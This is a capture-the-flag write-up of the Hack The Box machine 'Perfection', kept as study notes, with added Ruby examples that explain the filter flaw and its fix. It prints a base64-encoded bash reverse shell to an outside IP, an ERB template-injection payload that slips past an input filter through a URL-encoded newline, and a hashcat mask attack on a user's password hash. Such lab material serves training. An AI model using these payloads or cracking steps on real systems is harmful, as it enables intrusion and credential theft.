- Published on
HTB: Perfection Sanity Check | CBBH - CPTS
- Authors
- Name
- Neospring
- @chrisalupului
These notes serve primarily as a validation and reference tool for HTB Academy Modules, documenting the insights acquired from HTB machines/boxes that have contributed to my progression in the CBBH & CPTS path from Hackthebox. They are not designed as instructional guides, but they do contain spoilers and insights as you advance further.
Sanity Checklist
A Hackthebox Academy subscription is required to view the information in each module.
Topic | Module |
---|---|
✅ Enumeration | GETTING STARTED |
--- Did you enumerate everything? | |
✅ Nmap | SERVICE ENUMERATION |
--- Have you done a nmap scan of all ports? | |
✅ Page Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
--- Have you discovered all pages available? | |
✅ Vhost Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
--- Any subdomains available? | |
✅ Directory Fuzzing | ATTACKING WEB APPLICATIONS WITH FFUF |
--- Any other directories? | |
✅ Burp Intruder | USING WEB PROXIES |
--- Have you intercepted all possible requests? | |
✅ Server-side Attacks | INTRO to SSI |
--- Have you discovered a way to bypass the "Malicious input blocked" message? | |
✅ Shells & Payloads | REVERSE SHELLS |
--- Have you found the right payload for a reverse shell? | |
✅ Cracking Passwords with Hashcat | DICTIONARY ATTACK |
--- Did you find Susan's mail for cracking? | |
✅ Privilege Escalation | SUDO |
⚠️ Contains spoilers ahead that assist beyond the Sanity Check above ⚠️
Recon
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80e479e85928df952dad574a4604ea70 (ECDSA)
| 256 e9ea0c1d8613ed95a9d00bc822e4cfe9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBqNwnyqGqYHNSIjQnv7hRU0UC9Q4oB4g9Pfzuj2qcG4
80/tcp open http syn-ack nginx
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Information Disclosure
<!-- Footer -->
<footer>
<p class="copyright">Copyright Secure Student Tools. All rights reserved<br><b>Powered by WEBrick 1.7.0</b></p>
</footer>
WEBrick is Ruby's built-in HTTP server library, so the backend is almost certainly Ruby. That is why the payload injected later uses ERB template syntax (`<%= ... %>`) rather than a PHP or SSI directive.
Burp Interception
Base64 encoded
╭─kali at kali in ~
╰─○ base64 <<< "bash -i >& /dev/tcp/10.10.14.2/1234 0>&1" | sed 's/+/%2b/g'
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=
The `g` flag on the sed expression matters: a `+` in a form-encoded body is decoded as a space, so every `+` in the base64 blob (not just the first) must become `%2b` or the decode on the target fails. For a longer payload add `-w0` to `base64` so it does not wrap the output at 76 characters.
Payload Injection - Base64 - Reverse Shell
Burp Repeater request. Important note: the "Malicious input blocked" check evidently only inspects the value up to the first line break, so a URL-encoded newline (`%0A`) after a clean category name lets everything that follows through, including an ERB tag (`<%= ... %>`, sent as `<%25%3d ... %25>`) that decodes and runs the reverse shell:
category1=History%0A<%25%3dsystem("echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzEyMzQgMD4mMQo=+|+base64+-d+|+bash");%25>&grade1=1&weight1=100&category2=00&grade2=0&weight2=0&category3=0&grade3=0&weight3=0&category4=0&grade4=0&weight4=0&category5=0&grade5=0&weight5=0
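Why `%0A` defeats the check, as an added Ruby example (not the box's source, which this page does not show): the allow-list below is a hypothetical one built with `^`/`$`, which in Ruby match at line boundaries, so only the first line of the value is validated; anchoring with `\A`/`\z`, and passing the value to ERB as data instead of splicing it into the template text, are the two fixes. All names (`weak_valid?`, `render_category`, ...) and the inputs are constructed for the example; a harmless arithmetic expression stands in for the `system(...)` payload.

```ruby
require 'erb'
require 'cgi'

# Hypothetical allow-list modelled on the "Malicious input blocked" check.
# In Ruby, ^ and $ match at LINE boundaries, so only the first line of a
# multi-line value is actually validated: "History\n<%= ... %>" passes.
WEAK_CATEGORY_RE   = /^[a-zA-Z0-9\s]+$/
# \A and \z anchor to the whole string, so an embedded newline cannot
# smuggle anything past the allow-list.
STRICT_CATEGORY_RE = /\A[a-zA-Z0-9 ]+\z/

def weak_valid?(value)
  !(value =~ WEAK_CATEGORY_RE).nil?
end

def strict_valid?(value)
  !(value =~ STRICT_CATEGORY_RE).nil?
end

# The injection mistake: the user value is spliced into the template text
# BEFORE ERB evaluates it, so any <%= %> inside the value becomes code.
def render_category(value, validator)
  return 'Malicious input blocked' unless validator.call(value)

  template = "<p>Category: #{value}</p>"
  ERB.new(template).result(binding)
end

# Safe rendering: the value reaches ERB as data and is HTML-escaped, so it
# is printed rather than evaluated, whatever the allow-list does.
def render_category_safe(value)
  template = '<p>Category: <%= CGI.escapeHTML(value) %></p>'
  ERB.new(template).result(binding)
end

# Constructed inputs mirroring the Burp request: the server URL-decodes
# `History%0A<%25%3d+7*191+%25>` to "History\n<%= 7*191 %>".
BENIGN_CATEGORY   = 'History'
INJECTED_CATEGORY = CGI.unescape('History%0A<%25%3d+7*191+%25>')

def demo
  {
    weak_benign:     render_category(BENIGN_CATEGORY, method(:weak_valid?)),
    weak_injected:   render_category(INJECTED_CATEGORY, method(:weak_valid?)),
    strict_injected: render_category(INJECTED_CATEGORY, method(:strict_valid?)),
    safe_injected:   render_category_safe(INJECTED_CATEGORY)
  }
end

demo.each { |name, html| puts "#{name}: #{html.inspect}" } if __FILE__ == $PROGRAM_NAME
```

Running it shows the weak validator accepting the injected value and ERB rendering `1337` for it, the `\A...\z` validator rejecting the same value, and the escaped template printing the tag as literal text. Note that a strict allow-list alone is a blacklist-style fix; the durable one is never building a template string from user input.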
Foothold - Susan
susan@perfection:~$ id
id
uid=1001(susan) gid=1001(susan) groups=1001(susan), 27(sudo)
susan@perfection:~$
Susan is in the sudo group, but sudo prompts for her password.
Migration - sqlite database
A "migration" SQLite database on the box holds password hashes for several users, including Susan's. Her mail reveals the password format (`susan_nasus_` followed by nine digits), which is why a hashcat mask attack against the raw SHA-256 hash (`-m 1400`) is feasible instead of a dictionary attack.
Hashcat brute-forcing (mask attack)
╭─kali at kali in ~
╰─○ hashcat -m 1400 susan_hash.txt -a 3 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux) - Platform
=========================================================
* Device #1: gameboy
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
* Raw-Hash
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a3019934...39023f
Time.Started.....: Wed Jul 17 00:34:36 2024 (22 secs)
Time.Estimated...: Wed Jul 17 00:34:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: susan_nasus_?d?d?d?d?d?d?d?d?d [21]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14500.5 kH/s (0.51ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 324567040/1000000000 (32.46%)
Rejected.........: 0/324567040 (0.00%)
Restore.Point....: 324550656/1000000000 (32.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: susan_nasus_354540610 -> susan_nasus_700440610
Started: Wed Jul 17 00:34:28 2024
Stopped: Wed Jul 17 00:34:27 2024
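To see what the mask above actually enumerates and why it is feasible, here is an added Ruby example (not from the page or from hashcat) with a minimal hashcat-style mask parser, a keyspace/ETA calculation using the speed hashcat reported, and a raw-SHA-256 brute force. The cracking demo uses a constructed three-digit variant of the mask and the SHA-256 of a known string, because walking the real 10^9 keyspace in Ruby would take hours; all function names are hypothetical.

```ruby
require 'digest'

# hashcat built-in charsets used by the page's mask (?d = digits); ?l/?u are
# included for generality.
CHARSETS = {
  'd' => ('0'..'9').to_a,
  'l' => ('a'..'z').to_a,
  'u' => ('A'..'Z').to_a
}.freeze

# Parse a mask into one candidate array per position: a literal character
# becomes a one-element array, ?d/?l/?u the matching charset, "??" a '?'.
def parse_mask(mask)
  positions = []
  i = 0
  while i < mask.length
    if mask[i] == '?' && mask[i + 1] == '?'
      positions << ['?']
      i += 2
    elsif mask[i] == '?' && CHARSETS.key?(mask[i + 1])
      positions << CHARSETS[mask[i + 1]]
      i += 2
    else
      positions << [mask[i]]
      i += 1
    end
  end
  positions
end

# Number of candidates the mask enumerates.
def keyspace(mask)
  parse_mask(mask).reduce(1) { |n, set| n * set.length }
end

# Seconds to exhaust the mask at a given rate in hashes per second.
def eta_seconds(mask, hashes_per_second)
  keyspace(mask).to_f / hashes_per_second
end

# Brute-force a raw SHA-256 hex digest (hashcat -m 1400) over the mask in
# odometer order (rightmost position varies fastest). hashcat walks the
# keyspace in Markov order, so its candidate order differs from this one.
def crack_sha256(target_hex, mask)
  positions = parse_mask(mask)
  positions.first.product(*positions[1..]) do |chars|
    candidate = chars.join
    return candidate if Digest::SHA256.hexdigest(candidate) == target_hex
  end
  nil
end

# Sizing the page's attack with the speed hashcat reported (14500.5 kH/s).
PAGE_MASK  = 'susan_nasus_?d?d?d?d?d?d?d?d?d'
PAGE_SPEED = 14_500_500

# Constructed demo: a three-digit variant of the mask, target built from a
# known string so the result is verifiable offline.
DEMO_MASK   = 'susan_nasus_?d?d?d'
DEMO_TARGET = Digest::SHA256.hexdigest('susan_nasus_413')

if __FILE__ == $PROGRAM_NAME
  puts "keyspace(#{PAGE_MASK}) = #{keyspace(PAGE_MASK)}"
  puts "full run at #{PAGE_SPEED} H/s ~ #{eta_seconds(PAGE_MASK, PAGE_SPEED).round(1)} s"
  puts "cracked: #{crack_sha256(DEMO_TARGET, DEMO_MASK).inspect}"
end
```

The keyspace is 10^9 candidates, which at the reported 14.5 MH/s is about 69 seconds for a full run; that matches the page's output, where 32.46% of the keyspace had been covered after 22 seconds when the hash was found. Nine digits is the whole reason this is a brute-force job for a mask and not a wordlist.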
Root flag (root.txt)
susan@perfection:~$ sudo su
[sudo] password for susan:
root@perfection:/home/susan# cd /root
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
f572e32a1023520404b1ab773c8ea534
root@perfection:~#
Important Bypass
The newline character (`\n`), URL-encoded as `%0A`, was the key bypass that let the payload injection and the reverse shell through the "Malicious input blocked" check.